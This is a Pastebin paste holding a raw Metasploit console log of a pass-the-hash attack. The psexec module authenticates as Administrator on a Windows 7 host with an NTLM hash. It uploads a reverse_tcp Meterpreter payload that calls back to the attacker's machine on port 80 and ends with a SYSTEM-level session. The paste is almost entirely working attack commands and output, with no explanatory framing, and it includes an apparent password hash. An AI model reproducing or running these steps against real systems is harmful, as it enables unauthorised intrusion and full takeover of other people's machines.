API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Jun 15th, 2017
96
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.04 KB | None | 0 0
raw download clone embed print report
  1. meterpreter > background
  2. msf exploit(ms08_067_netapi) > back
  3. msf > use exploit/windows/smb/psexec
  4. msf exploit(psexec) > set RHOST 192.168.1.126
  5. RHOST => 192.168.1.126
  6. msf exploit(psexec) > set PAYLOAD windows/meterpreter/reverse_tcp
  7. PAYLOAD => windows/meterpreter/reverse_tcp
  8. msf exploit(psexec) > set LHOST 192.168.1.140
  9. LHOST => 192.168.1.140
  10. msf exploit(psexec) > set LPORT 80
  11. LPORT => 80
  12. msf exploit(psexec) > set SMBUser Administrator
  13. SMBUser => Administrator
  14. msf exploit(psexec) > set SMBPass e669bec4e8f85b6bf1f4ca68da9d1558:67efcdf5bcc5f3b53150e26e2a94
  15. a3fc
  16. SMBPass => e669bec4e8f85b6bf1f4ca68da9d1558:67efcdf5bcc5f3b53150e26e2a94a3fc
  17. msf exploit(psexec) > show options
  18.  
  19. Module options:
  20.  
  21. Name Current Setting Required Description
  22. ---- --------------- -------- -----------
  23. RHOST 192.168.1.126 yes The target address
  24. RPORT 445 yes Set the SMB service port
  25. SMBDomain WORKGROUP no The Windows domain to use for authentication
  26. SMBPass e669bec4e8f85b6bf1f4ca68da9d1558:67efcdf5bcc5f3b53150e26e2a94a3fc no The password for the specified username
  27. SMBUser Administrator no The username to authenticate as
  28.  
  29.  
  30. Payload options (windows/meterpreter/reverse_tcp):
  31.  
  32. Name Current Setting Required Description
  33. ---- --------------- -------- -----------
  34. EXITFUNC process yes Exit technique: seh, thread, process
  35. LHOST 192.168.1.140 yes The listen address
  36. LPORT 80 yes The listen port
  37.  
  38.  
  39. Exploit target:
  40.  
  41. Id Name
  42. -- ----
  43. 0 Automatic
  44.  
  45.  
  46. msf exploit(psexec) > exploit -j -z
  47. [*] Exploit running as background job.
  48.  
  49. [*] Started reverse handler on 192.168.1.140:80
  50. [*] Connecting to the server...
  51. msf exploit(psexec) > [*] Authenticating as user 'Administrator'...
  52. [*] Uploading payload...
  53. [*] Created \CVoJSded.exe...
  54. [*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.1.126[\svcctl] ...
  55. [*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.1.126[\svcctl] ...
  56. [*] Obtaining a service manager handle...
  57. [*] Creating a new service (PkyMibtg - "MhHUOHCe")...
  58. [*] Closing service handle...
  59. [*] Opening service...
  60. [*] Starting the service...
  61. [*] Removing the service...
  62. [*] Closing service handle...
  63. [*] Deleting \CVoJSded.exe...
  64. [*] Sending stage (748544 bytes) to 192.168.1.126
  65. [*] Meterpreter session 2 opened (192.168.1.140:80 -> 192.168.1.126:49356) at Sat Sep 18 11:09:55 +0200 2010
  66. sessions -i 2
  67. [*] Starting interaction with 2...
  68.  
  69. meterpreter > sysinfo
  70. Computer: P0002
  71. OS : Windows 7 (Build 7600, ).
  72. Arch : x86
  73. Language: en_US
  74. meterpreter > getuid
  75. Server username: NT AUTHORITY\SYSTEM
  76. meterpreter >
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!